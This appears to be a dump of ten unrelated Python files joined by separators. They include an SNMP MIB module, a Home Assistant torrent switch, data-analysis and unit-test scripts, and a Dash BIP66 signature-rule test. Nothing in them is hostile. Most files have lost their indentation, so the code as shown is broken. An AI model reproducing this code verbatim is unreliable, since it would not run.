cjnIpxIfVlanIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 5), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfVlanIfIndex.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfVlanIfIndex.setDescription("The interface index of the VLAN for this interface. This number MUST correlate with the IfTable's IfIndex in MIB-II or RFC2233.")
cjnIpxIfName = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 31))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfName.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfName.setDescription('The protocol unique name associated with this interface. This name is limited to 31 characters and may appear in other protocol interface entries such as IP and Appletalk but MAY NOT be duplicated within the cjnIpxIfTable. In other words, other protocols can use this interface name but IPX may only have this name associated with one interface.')
cjnIpxIfTicks = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 7), Integer32().clone(1)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfTicks.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfTicks.setDescription('The period of time, in ticks, that it takes to transmit one byte of data, excluding protocol headers, to a destination on the other end of the circuit, if the circuit is free of other traffic.')
cjnIpxIfType20RbcastMode = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("disabled", 1), ("inbound", 2), ("outbound", 3), ("both", 4))).clone('disabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfType20RbcastMode.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfType20RbcastMode.setDescription('The handling of NetBIOS Type 20 packets on the interface. If set to disabled(1), Type 20 packets are neither sent nor received on the interface. If set to inbound(2), Type 20 packets may be received but not sent. If set to outbound(3), Type 20 packets may be sent on the interface but not received. If set to both(4), Type 20 packets may be sent and received.')
cjnIpxIfAdminStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("up", 1), ("down", 2), ("testing", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfAdminStatus.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfAdminStatus.setDescription('The administrative state of this interface. The testing(3) state indicates that no operational packets can be passed. When a managed system initializes, all interfaces start with ifAdminStatus in the down(2) state. As a result of either explicit management action or per configuration information retained by the managed system, ifAdminStatus is then changed to either the up(1) or testing(3) states (or remains in the down(2) state).')
cjnIpxIfOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("up", 1), ("down", 2), ("testing", 3), ("lowerLayerDown", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfOperStatus.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfOperStatus.setDescription('The current operational state of this interface. The testing(3) state indicates that no operational packets can be passed. If cjnIpxIfAdminStatus is down(2) then cjnIpxIfOperStatus should be down(2). If cjnIpxIfAdminStatus is up(1) then cjnIpxIfOperStatus should change to up(1) if the interface is ready to transmit and receive network traffic; it should change to lowerLayerDown(4) if the interface is waiting for external actions (such as a port on the VLAN associated with the interface becoming operational).')
mibBuilder.exportSymbols("IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB", cjnIpxIfNextIndex=cjnIpxIfNextIndex, cjnIpxIfTable=cjnIpxIfTable, cjnIpxIfAdminStatus=cjnIpxIfAdminStatus, cjnIpxIfMgmt=cjnIpxIfMgmt, cjnIpxIfEncapsType=cjnIpxIfEncapsType, cjnIpxIfName=cjnIpxIfName, cjnIpxIfNetNumber=cjnIpxIfNetNumber, cjnIpxIfRowStatus=cjnIpxIfRowStatus, cjnIpxIfTicks=cjnIpxIfTicks, cjnIpxIfVlanIfIndex=cjnIpxIfVlanIfIndex, cjnIpxIfType20RbcastMode=cjnIpxIfType20RbcastMode, cjnIpxIfGroup=cjnIpxIfGroup, cjnIpxIfOperStatus=cjnIpxIfOperStatus, cjnIpxIfIndex=cjnIpxIfIndex, cjnIpxIfEntry=cjnIpxIfEntry, PYSNMP_MODULE_ID=cjnIpxIfMgmt, cjnIpxIfNumber=cjnIpxIfNumber)
|
"""Support for setting the Transmission BitTorrent client Turtle Mode."""
import logging
from homeassistant.const import CONF_NAME, STATE_OFF, STATE_ON
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import ToggleEntity
from .const import DOMAIN, SWITCH_TYPES
_LOGGING = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Transmission switch."""
tm_client = hass.data[DOMAIN][config_entry.entry_id]
name = config_entry.data[CONF_NAME]
dev = []
for switch_type, switch_name in SWITCH_TYPES.items():
dev.append(TransmissionSwitch(switch_type, switch_name, tm_client, name))
async_add_entities(dev, True)
class TransmissionSwitch(ToggleEntity):
"""Representation of a Transmission switch."""
def __init__(self, switch_type, switch_name, tm_client, name):
"""Initialize the Transmission switch."""
self._name = switch_name
self.client_name = name
self.type = switch_type
self._tm_client = tm_client
self._state = STATE_OFF
self._data = None
self.unsub_update = None
@property
def name(self):
"""Return the name of the switch."""
return f"{self.client_name} {self._name}"
@property
def unique_id(self):
"""Return the unique id of the entity."""
return f"{self._tm_client.api.host}-{self.name}"
@property
def should_poll(self):
"""Poll for status regularly."""
return False
@property
def is_on(self):
"""Return true if device is on."""
return self._state == STATE_ON
@property
def available(self):
"""Could the device be accessed during the last update call."""
return self._tm_client.api.available
def turn_on(self, **kwargs):
"""Turn the device on."""
if self.type == "on_off":
_LOGGING.debug("Starting all torrents")
self._tm_client.api.start_torrents()
elif self.type == "turtle_mode":
_LOGGING.debug("Turning Turtle Mode of Transmission on")
self._tm_client.api.set_alt_speed_enabled(True)
self._tm_client.api.update()
def turn_off(self, **kwargs):
"""Turn the device off."""
if self.type == "on_off":
_LOGGING.debug("Stopping all torrents")
self._tm_client.api.stop_torrents()
if self.type == "turtle_mode":
_LOGGING.debug("Turning Turtle Mode of Transmission off")
self._tm_client.api.set_alt_speed_enabled(False)
self._tm_client.api.update()
async def async_added_to_hass(self):
"""Handle entity which will be added."""
self.unsub_update = async_dispatcher_connect(
self.hass,
self._tm_client.api.signal_update,
self._schedule_immediate_update,
)
@callback
def _schedule_immediate_update(self):
self.async_schedule_update_ha_state(True)
    async def async_will_remove_from_hass(self):
"""Unsubscribe from update dispatcher."""
if self.unsub_update:
self.unsub_update()
self.unsub_update = None
def update(self):
"""Get the latest data from Transmission and updates the state."""
active = None
if self.type == "on_off":
self._data = self._tm_client.api.data
if self._data:
active = self._data.activeTorrentCount > 0
elif self.type == "turtle_mode":
active = self._tm_client.api.get_alt_speed_enabled()
if active is None:
return
self._state = STATE_ON if active else STATE_OFF
|
import csv
import time
import os
import pandas as pd
DATA_ROOT = "C:\\RS\\Amazon\\All\\"
MINIMUM_X_CATEGORIES_FILENAME = 'minimum_2_Categories.csv'
timestamp = time.strftime('%y%m%d%H%M%S')
out_filename = os.path.join(DATA_ROOT, timestamp + 'categories_permutations.csv')
with open(out_filename, 'w', newline='', encoding='utf8') as sum_f:
writer = csv.writer(sum_f, delimiter=',', lineterminator='\n')
entire_data = pd.read_csv(os.path.join(DATA_ROOT, MINIMUM_X_CATEGORIES_FILENAME))
categories = entire_data.columns
row = ['idx_cat_a', 'cat_a', 'idx_cat_b', 'cat_b', 'user_count', 'item_count_a', 'item_count_b', 'item_both']
writer.writerow(row)
for idx_cat_a, cat_a in enumerate(categories):
if idx_cat_a == 0:
continue
for idx_cat_b, cat_b in enumerate(categories):
if idx_cat_b <= idx_cat_a:
continue
# print(idx_cat_a, cat_a, idx_cat_b, cat_b)
# user_count_a = entire_data[cat_a].astype(bool).sum()
# user_count_b = entire_data[cat_b].astype(bool).sum()
user_count = entire_data.loc[entire_data[cat_b] != 0, cat_a].astype(bool).sum()
# item_count_a = entire_data[cat_a].sum()
# item_count_b = entire_data[cat_b].sum()
item_count_a = entire_data.loc[(entire_data[cat_a] != 0) & (entire_data[cat_b] != 0), cat_a].sum()
item_count_b = entire_data.loc[(entire_data[cat_a] != 0) & (entire_data[cat_b] != 0), cat_b].sum()
item_both = item_count_a + item_count_b
row = [idx_cat_a, cat_a, idx_cat_b, cat_b,user_count, item_count_a, item_count_b, item_both]
writer.writerow(row)
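# Minimal sanity-check sketch (hypothetical toy data, not part of the original
# script): the same masking logic on a tiny frame, to make the semantics of the
# exported counts explicit.
_toy = pd.DataFrame({'user': ['u1', 'u2', 'u3'],
                     'Books': [2, 0, 1],
                     'Music': [1, 3, 0]})
# users active in both 'Books' and 'Music' -> only u1
assert _toy.loc[_toy['Music'] != 0, 'Books'].astype(bool).sum() == 1
# items per category restricted to users active in both categories
assert _toy.loc[(_toy['Books'] != 0) & (_toy['Music'] != 0), 'Books'].sum() == 2
assert _toy.loc[(_toy['Books'] != 0) & (_toy['Music'] != 0), 'Music'].sum() == 1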
|
from persistent.interfaces import IPersistent
import lxml.objectify
import mock
import unittest
import zeit.cms.workingcopy.interfaces
import zeit.edit.container
import zeit.edit.testing
import zeit.edit.tests.fixture
import zope.interface
import zope.security.proxy
class TestContainer(unittest.TestCase):
def get_container(self):
parent = mock.Mock()
parent._p_changed = False
zope.interface.alsoProvides(parent, IPersistent)
class Container(zeit.edit.container.Base):
def _add(self, item):
pass
def _delete(self, key):
pass
def _get_keys(self, node):
return []
return Container(parent, mock.Mock())
def test_delitem_should_set_p_changed(self):
container = self.get_container()
del container['foo']
self.assertTrue(container.__parent__._p_changed)
def test_add_should_set_p_changed(self):
container = self.get_container()
item = mock.Mock()
item.__name__ = 'item'
item.__parent__ = None
container.add(item)
self.assertTrue(container.__parent__._p_changed)
def test_updateOrder_should_set_p_changed(self):
container = self.get_container()
container.updateOrder([])
self.assertTrue(container.__parent__._p_changed)
class UnknownBlockTest(zeit.edit.testing.FunctionalTestCase):
def test_no_factory_for_node_returns_UnknownBlock(self):
xml = lxml.objectify.fromstring("""
<container xmlns:cp="http://namespaces.zeit.de/CMS/cp">
<block cp:type="block" cp:__name__="foo"/>
<something cp:__name__="bar"/>
</container>
""")
container = zeit.edit.tests.fixture.Container(mock.Mock(), xml)
self.assertTrue(zeit.edit.interfaces.IUnknownBlock.providedBy(
container['bar']))
class ContainerTest(zeit.edit.testing.FunctionalTestCase):
def setUp(self):
super(ContainerTest, self).setUp()
self.context = mock.Mock()
zope.interface.alsoProvides(self.context, IPersistent)
self.container = zeit.edit.tests.fixture.Container(
self.context, lxml.objectify.fromstring('<container/>'))
def test_slice(self):
blocks = [self.container.create_item('block') for i in range(4)]
expected = [blocks[0], blocks[1]]
expected = [x.__name__ for x in expected]
actual = [x.__name__ for x in self.container.slice(
blocks[0].__name__, blocks[1].__name__)]
self.assertEqual(expected, actual)
def test_get_recursive_finds_item_in_self(self):
block = self.container.create_item('block')
self.assertEqual(block, self.container.get_recursive(block.__name__))
def test_get_recursive_finds_item_in_child_container(self):
other = self.container.create_item('container')
block = other.create_item('block')
self.assertEqual(block, self.container.get_recursive(block.__name__))
def test_moving_item_between_containers_sends_event(self):
check_move = mock.Mock()
zope.component.getGlobalSiteManager().registerHandler(
check_move, (zeit.edit.interfaces.IBlock,
zope.lifecycleevent.IObjectMovedEvent))
block = self.container.create_item('block')
other = zeit.edit.tests.fixture.Container(
self.context, lxml.objectify.fromstring('<container/>'))
del self.container[block.__name__]
other.add(block)
self.assertTrue(check_move.called)
def test_moved_item_has_new_parent(self):
# Annoying mechanics gymnastics to check that security works.
wc = zeit.cms.workingcopy.interfaces.IWorkingcopy(None)
self.container.__parent__ = wc
other = zeit.edit.tests.fixture.Container(
wc, lxml.objectify.fromstring('<container/>'))
block = self.container.create_item('block')
del self.container[block.__name__]
wrapped = zope.security.proxy.ProxyFactory(block)
other.add(wrapped)
# Since we don't retrieve block from other, this actually checks that
# __parent__ was changed.
self.assertEqual(other, block.__parent__)
def test_getitem_with_int_uses_position(self):
block = self.container.create_item('block')
self.assertEqual(block, self.container[0])
with self.assertRaises(KeyError):
self.container[1]
|
from django.contrib import admin
from .models import Artists, Albums, Tracks
# Register your models here.
admin.site.register([Artists, Albums, Tracks])
|
import numpy as np
import astropy.units as u
from astropy.convolution.kernels import Gaussian2DKernel
from scipy import signal
from ..clean import clean, ms_clean, component, radial_prolate_sphereoidal,\
vec_radial_prolate_sphereoidal
from ..transform import dft_map, idft_map
def test_clean_ideal():
n = m = 65
pos1 = [15, 30]
pos2 = [40, 32]
clean_map = np.zeros((n, m))
clean_map[pos1[0], pos1[1]] = 10.
clean_map[pos2[0], pos2[1]] = 7.
dirty_beam = np.zeros((n, m))
dirty_beam[(n-1)//4:(n-1)//4 + (n-1)//2, (m-1)//2] = 0.75
dirty_beam[(n-1)//2, (m-1)//4:(m-1)//4 + (m-1)//2, ] = 0.75
dirty_beam[(n-1)//2, (m-1)//2] = 0.8
dirty_beam = np.pad(dirty_beam, (65, 65), 'constant')
dirty_map = signal.convolve(clean_map, dirty_beam, mode='same')
# Disable convolution of model with gaussian for testing
out_map = clean(dirty_map, dirty_beam, clean_beam_width=0.0)
    # Within default threshold of 0.1
    assert np.allclose(clean_map, out_map[0] + out_map[1], atol=dirty_beam.max() * 0.1)
def test_component():
comp = np.zeros((3, 3))
comp[1, 1] = 1.0
res = component(scale=0, shape=(3, 3))
assert np.array_equal(res, comp)
res = component(scale=1, shape=(3, 3))
assert np.array_equal(res, comp)
res = component(scale=2, shape=(6, 6))
assert np.all(res[0, :] == 0.0)
assert np.all(res[:, 0] == 0.0)
assert np.all(res[2:4, 2:4] == res.max())
res = component(scale=3, shape=(7, 7))
assert np.all(res[0, :] == 0.0)
assert np.all(res[:, 0] == 0.0)
assert res[3, 3] == 1
def test_radial_prolate_spheroidal():
amps = [radial_prolate_sphereoidal(r) for r in [-1.0, 0.0, 0.5, 1.0, 2.0]]
assert amps[0] == 1.0
assert amps[1] == 1.0
assert amps[2] == 0.36106538453111797
assert amps[3] == 0.0
assert amps[4] == 0.0
def test_vec_radial_prolate_spheroidal():
radii = np.linspace(-0.5, 1.5, 1000)
amps1 = [radial_prolate_sphereoidal(r) for r in radii]
amps2 = vec_radial_prolate_sphereoidal(radii)
assert np.allclose(amps1, amps2)
def test_ms_clean_ideal():
n = m = 65
pos1 = [15, 30]
pos2 = [40, 32]
clean_map = np.zeros((n, m))
clean_map[pos1[0], pos1[1]] = 10.
clean_map[pos2[0], pos2[1]] = 7.
dirty_beam = np.zeros((n, m))
dirty_beam[(n-1)//4:(n-1)//4 + (n-1)//2, (m-1)//2] = 0.75
dirty_beam[(n-1)//2, (m-1)//4:(m-1)//4 + (m-1)//2, ] = 0.75
dirty_beam[(n-1)//2, (m-1)//2] = 1.0
dirty_beam = np.pad(dirty_beam, (65, 65), 'constant')
dirty_map = signal.convolve2d(clean_map, dirty_beam, mode='same')
# Disable convolution of model with gaussian for testing
model, res = ms_clean(dirty_map, dirty_beam, scales=[1], clean_beam_width=0.0)
recovered = model + res
    # Within default threshold
assert np.allclose(clean_map, recovered, atol=dirty_beam.max() * 0.1)
def test_clean_sim():
n = m = 32
data = Gaussian2DKernel(stddev=3.0, x_size=n, y_size=m).array
# data = np.zeros((n, m))
# data[13,13] = 10.0
# data[12:14,12:14] = 10.0/4.0
half_log_space = np.logspace(np.log10(0.03030303), np.log10(0.48484848), 10)
theta = np.linspace(0, 2*np.pi, 32)
theta = theta[np.newaxis, :]
theta = np.repeat(theta, 10, axis=0)
r = half_log_space
r = r[:, np.newaxis]
r = np.repeat(r, 32, axis=1)
x = r * np.sin(theta)
y = r * np.cos(theta)
sub_uv = np.vstack([x.flatten(), y.flatten()])
sub_uv = np.hstack([sub_uv, np.zeros((2, 1))]) / u.arcsec
# Factor of 9 is compensate for the factor of 3 * 3 increase in size
dirty_beam = idft_map(np.ones(321)*9, (n*3, m*3), sub_uv)
vis = dft_map(data, sub_uv)
dirty_map = idft_map(vis, (n, m), sub_uv)
clean_map, res = clean(dirty_map, dirty_beam, clean_beam_width=0)
    assert np.allclose(data, clean_map + res, atol=dirty_beam.max() * 0.1)
|
# -*-coding:Utf-8 -*
from mplotlab import App
from matplotlib.backend_bases import NavigationToolbar2
import wx
class Cursors:
# this class is only used as a simple namespace
HAND, POINTER, SELECT_REGION, MOVE = list(range(4))
cursors = Cursors()
cursord = {
cursors.MOVE : wx.CURSOR_HAND,
cursors.HAND : wx.CURSOR_HAND,
cursors.POINTER : wx.CURSOR_ARROW,
cursors.SELECT_REGION : wx.CURSOR_CROSS,
}
class Navigation(NavigationToolbar2):
def __init__(self,*a,**k):
NavigationToolbar2.__init__(self, *a,**k)
def _init_toolbar(self,*args,**kwargs):
pass
def set_message(self,s):
""" display in the status bar
the mouseover data (x,y)
"""
try:
App().mainWin.GetStatusBar().SetStatusText(s,0)
except:
pass
def set_cursor(self, cursor):
cursor =wx.StockCursor(cursord[cursor])
self.canvas.SetCursor( cursor )
def dynamic_update(self):
d = self._idle
self._idle = False
if d:
self.canvas.draw()
self._idle = True
def press(self, event):
if self._active == 'ZOOM':
self.wxoverlay = wx.Overlay()
def release(self, event):
if self._active == 'ZOOM':
# When the mouse is released we reset the overlay and it
# restores the former content to the window.
self.wxoverlay.Reset()
del self.wxoverlay
def draw_rubberband(self, event, x0, y0, x1, y1):
# Use an Overlay to draw a rubberband-like bounding box.
dc = wx.ClientDC(self.canvas)
odc = wx.DCOverlay(self.wxoverlay, dc)
odc.Clear()
# Mac's DC is already the same as a GCDC, and it causes
# problems with the overlay if we try to use an actual
# wx.GCDC so don't try it.
if 'wxMac' not in wx.PlatformInfo:
dc = wx.GCDC(dc)
height = self.canvas.figure.bbox.height
y1 = height - y1
y0 = height - y0
        if y1 < y0: y0, y1 = y1, y0
        if x1 < x0: x0, x1 = x1, x0
w = x1 - x0
h = y1 - y0
rect = wx.Rect(x0, y0, w, h)
rubberBandColor = '#C0C0FF' # or load from config?
# Set a pen for the border
color = wx.NamedColour(rubberBandColor)
dc.SetPen(wx.Pen(color, 1))
# use the same color, plus alpha for the brush
r, g, b = color.Get()
color.Set(r,g,b, 0x60)
dc.SetBrush(wx.Brush(color))
dc.DrawRectangleRect(rect)
|
"""
UnitTests of the python interface to the neuron class.
Items declared in neuron/__init__.py
$Id$
"""
import unittest
import neuron
from neuron import h
class NeuronTestCase(unittest.TestCase):
"""Tests of neuron"""
def testHClass(self):
"""Test subclass of hoc class."""
from ._subclass import A1
a = A1(5)
assert a.x == 5.0
assert a.p() == 6.0
b = A1(4)
a.s = "one"
b.s = "two"
assert a.s == "one"
assert b.s == "two"
assert h.A[0].s == "one"
assert a.p() == 7.0
assert b.p() == 5.0
a.a = 2
b.a = 3
assert a.a == 2
assert b.a == 3
assert h.List("A").count() == 2
a = 1
b = 1
assert h.List("A").count() == 0
@classmethod
def psection(cls):
"""Test neuron.psection(Section)"""
s = h.Section(name="soma")
neuron.psection(s)
def testpsection(self):
from multiprocessing import Process
p = Process(target=NeuronTestCase.psection)
p.start()
p.join()
def testABI(self):
"""Test use of some Py_LIMITED_API for python3."""
# Py_nb_bool
assert True if h else False
assert True if h.List else False
# ensure creating a List doesn't change the truth value
l = h.List()
assert True if h.List else False
assert False if l else True
v = h.Vector(1)
l.append(v)
assert True if l else False
# Py_sq_length
assert len(l) == 1
# Py_sq_item
assert l[0] == v
# Py_sq_ass_item
v.x[0] = 5
assert v.x[0] == 5
def testIterators(self):
"""Test section, segment, mechanism, rangevar iterators."""
# setup model
sections = [h.Section(name="s%d" % i) for i in range(3)]
iclamps = [h.IClamp(sec(0.5)) for sec in sections]
for i, sec in enumerate(sections):
sec.nseg = 3
sec.insert("pas")
sec.insert("hh")
# iterate
import hashlib
sha = hashlib.sha256()
for sec in h.allsec():
for seg in sec:
for mech in seg:
for var in mech:
txt = "%s(%g).%s.%s=%g" % (
sec.name(),
seg.x,
mech.name(),
var.name(),
var[0],
)
sha.update(txt.encode("utf-8"))
d = sha.hexdigest()
d1 = "ac49344c054bc9e56e165fa75423d8bcb7cce96c4527f259362b527ee05103d8"
# in case NRN_ENABLE_MOD_COMPATIBILITY=ON
# (set by -DNRN_ENABLE_CORENEURON=ON)
d2 = "44366906aa94a50644bc734eb23afcc25d1206c0431c4e7908698eeb2597c385"
assert d == d1 or d == d2
sections[0](0.5).na_ion.ena = 40.0 # issue #651
assert sections[0](0.5).na_ion.ena == 40.0
def testSectionArgOrder(self):
"""First optional arg for Section is name (but name="name" is recommended)"""
soma = h.Section("soma")
assert soma.name() == "soma"
def testSectionCell(self):
"""Section.cell() internally referenced as weakref."""
err = -1
try:
soma = h.Section(cell="foo", name="soma")
err = 1
except:
err = 0
assert err == 0
class Cell:
def __str__(self):
return "hello"
c = Cell()
soma = h.Section(cell=c, name="soma")
assert soma.name() == "hello.soma"
assert soma.cell() == c
del c
assert soma.cell() is None
def testSectionListIterator(self):
"""As of v8.0, iteration over a SectionList does not change the cas"""
# See issue 509. SectionList iterator bug requires change to
# longstanding behavior
soma = h.Section(name="soma")
soma.push()
sections = [h.Section(name="s%d" % i) for i in range(3)]
assert len([s for s in h.allsec()]) == 4
sl = h.SectionList(sections)
# Iteration over s SectionList does not change the currently accessed section
for s in sl:
assert 1 and h.cas() == soma
# If an iteration does not complete the section stack is still ok.
assert sections[1] in sl
assert 2 and h.cas() == soma
@classmethod
def ExtendedSection(cls):
"""test prsection (modified print statement)"""
from neuron.sections import ExtendedSection
s = ExtendedSection(name="test")
s.psection()
def testExtendedSection(self):
from multiprocessing import Process
p = Process(target=NeuronTestCase.ExtendedSection)
p.start()
p.join()
@classmethod
def RxDexistence(cls):
"""test import rxd and geometry3d"""
error = 0
try:
from neuron import rxd
from neuron.rxd import geometry
print("has_geometry3d is " + str(geometry.has_geometry3d))
except Exception as e:
print("'from neuron import rxd' failed", e)
error = 1
else:
try:
a = basicRxD3D()
print(" basicRxD3D() ran with no exception")
except Exception as e:
print("'basicRxD3D()' failed", e)
error = 1
assert error == 0
return 0
def testHelp(self):
error = False
try:
from neuron import doc
print(doc.get_docstring("xpanel", ""))
except Exception as e:
print("'doc.get_docstring('xpanel', '')' failed:", e)
error = True
self.assertFalse(error)
return 0
def testRxDexistence(self):
from multiprocessing import Process
p = Process(target=NeuronTestCase.RxDexistence)
p.start()
p.join()
assert p.exitcode == 0
return 0
def test_newobj_err(self):
"""Test deletion of incompletely constructed objects"""
print() # Error message not on above line
h.load_file("stdlib.hoc") # need hoc String
h(
"""
begintemplate Foo
endtemplate Foo
begintemplate NewObj
objref this, ob, foo1, foo2
proc init() {localobj s
foo1 = new Foo() // Constructed before error, even partial constructions fill this field.
if ($1 == 0) {
execerror("generate an error") // All NewObj instances undergoing construction
} else if ($1 == $2) {
// This and all NewObj instances prior to this will construct successfully.
// All after this will be partially constructed.
// The execerror should cause only the partially constructed NewObj to
// be destroyed.
s = new String()
sprint(s.s, "ob = new NewObj(%d, %d)", $1-1, $2)
execute1(s.s, this)
} else {
ob = new NewObj($1-1, $2)
}
foo2 = new Foo() // Only instances prior to execute1 reach here.
}
endtemplate NewObj
"""
)
# arg[0] recursion depth
# arg[0] - arg[1] + 1 should be successfully constructed
# arg[1] should be partially constructed and destroyed.
args = (4, 2)
a = h.NewObj(*args)
b = h.List("NewObj")
c = h.List("Foo")
print("#NewObj and #Foo in existence", b.count(), c.count())
z = args[0] - args[1] + 1
assert b.count() == z
assert c.count() == 2 * z
del a
del b
del c
b = h.List("NewObj")
c = h.List("Foo")
print("after del a #NewObj and #Foo in existence", b.count(), c.count())
assert b.count() == 0
assert c.count() == 0
return 1
def basicRxD3D():
from neuron import h, rxd
s = h.Section(name="s")
s.L = s.diam = 1
cyt = rxd.Region([s])
ca = rxd.Species(cyt)
rxd.set_solve_type(dimension=3)
h.finitialize(-65)
h.fadvance()
return 1
def suite():
suite = unittest.makeSuite(NeuronTestCase, "test")
return suite
if __name__ == "__main__":
# unittest.main()
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite())
|
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test BIP66 (DER SIG).
Test that the DERSIG soft-fork activates at (regtest) height 1251.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.mininode import *
from test_framework.blocktools import create_coinbase, create_block
from test_framework.script import CScript
from io import BytesIO
DERSIG_HEIGHT = 1251
# Reject codes that we might receive in this test
REJECT_INVALID = 16
REJECT_OBSOLETE = 17
REJECT_NONSTANDARD = 64
# A canonical signature consists of:
# <30> <total len> <02> <len R> <R> <02> <len S> <S> <hashtype>
def unDERify(tx):
"""
Make the signature in vin 0 of a tx non-DER-compliant,
by adding padding after the S-value.
"""
scriptSig = CScript(tx.vin[0].scriptSig)
newscript = []
for i in scriptSig:
if (len(newscript) == 0):
newscript.append(i[0:-1] + b'\0' + i[-1:])
else:
newscript.append(i)
tx.vin[0].scriptSig = CScript(newscript)
def create_transaction(node, coinbase, to_address, amount):
from_txid = node.getblock(coinbase)['tx'][0]
inputs = [{ "txid" : from_txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
tx = CTransaction()
tx.deserialize(BytesIO(hex_str_to_bytes(signresult['hex'])))
return tx
class BIP66Test(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [['-whitelist=127.0.0.1', '-dip3params=9000:9000']]
self.setup_clean_chain = True
def run_test(self):
self.nodes[0].add_p2p_connection(P2PInterface())
network_thread_start()
# wait_for_verack ensures that the P2P connection is fully up.
self.nodes[0].p2p.wait_for_verack()
self.log.info("Mining %d blocks", DERSIG_HEIGHT - 2)
self.coinbase_blocks = self.nodes[0].generate(DERSIG_HEIGHT - 2)
self.nodeaddress = self.nodes[0].getnewaddress()
self.log.info("Test that a transaction with non-DER signature can still appear in a block")
spendtx = create_transaction(self.nodes[0], self.coinbase_blocks[0],
self.nodeaddress, 1.0)
unDERify(spendtx)
spendtx.rehash()
tip = self.nodes[0].getbestblockhash()
block_time = self.nodes[0].getblockheader(tip)['mediantime'] + 1
block = create_block(int(tip, 16), create_coinbase(DERSIG_HEIGHT - 1), block_time)
block.nVersion = 2
block.vtx.append(spendtx)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
self.log.info("Test that blocks must now be at least version 3")
tip = block.sha256
block_time += 1
block = create_block(tip, create_coinbase(DERSIG_HEIGHT), block_time)
block.nVersion = 2
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), tip)
wait_until(lambda: "reject" in self.nodes[0].p2p.last_message.keys(), lock=mininode_lock)
with mininode_lock:
assert_equal(self.nodes[0].p2p.last_message["reject"].code, REJECT_OBSOLETE)
assert_equal(self.nodes[0].p2p.last_message["reject"].reason, b'bad-version(0x00000002)')
assert_equal(self.nodes[0].p2p.last_message["reject"].data, block.sha256)
del self.nodes[0].p2p.last_message["reject"]
self.log.info("Test that transactions with non-DER signatures cannot appear in a block")
block.nVersion = 3
spendtx = create_transaction(self.nodes[0], self.coinbase_blocks[1],
self.nodeaddress, 1.0)
unDERify(spendtx)
spendtx.rehash()
# First we show that this tx is valid except for DERSIG by getting it
# rejected from the mempool for exactly that reason.
assert_raises_rpc_error(-26, '64: non-mandatory-script-verify-flag (Non-canonical DER signature)', self.nodes[0].sendrawtransaction, bytes_to_hex_str(spendtx.serialize()), True)
# Now we verify that a block with this transaction is also invalid.
block.vtx.append(spendtx)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), tip)
wait_until(lambda: "reject" in self.nodes[0].p2p.last_message.keys(), lock=mininode_lock)
with mininode_lock:
# We can receive different reject messages depending on whether
# dashd is running with multiple script check threads. If script
# check threads are not in use, then transaction script validation
# happens sequentially, and dashd produces more specific reject
# reasons.
assert self.nodes[0].p2p.last_message["reject"].code in [REJECT_INVALID, REJECT_NONSTANDARD]
assert_equal(self.nodes[0].p2p.last_message["reject"].data, block.sha256)
if self.nodes[0].p2p.last_message["reject"].code == REJECT_INVALID:
# Generic rejection when a block is invalid
assert_equal(self.nodes[0].p2p.last_message["reject"].reason, b'block-validation-failed')
else:
assert b'Non-canonical DER signature' in self.nodes[0].p2p.last_message["reject"].reason
self.log.info("Test that a version 3 block with a DERSIG-compliant transaction is accepted")
block.vtx[1] = create_transaction(self.nodes[0],
self.coinbase_blocks[1], self.nodeaddress, 1.0)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), block.sha256)
if __name__ == '__main__':
BIP66Test().main()
|
import collections
EstimatorSetting = collections.namedtuple(
'EstimatorSetting', ['title', 'estimator', 'parameter_space'])
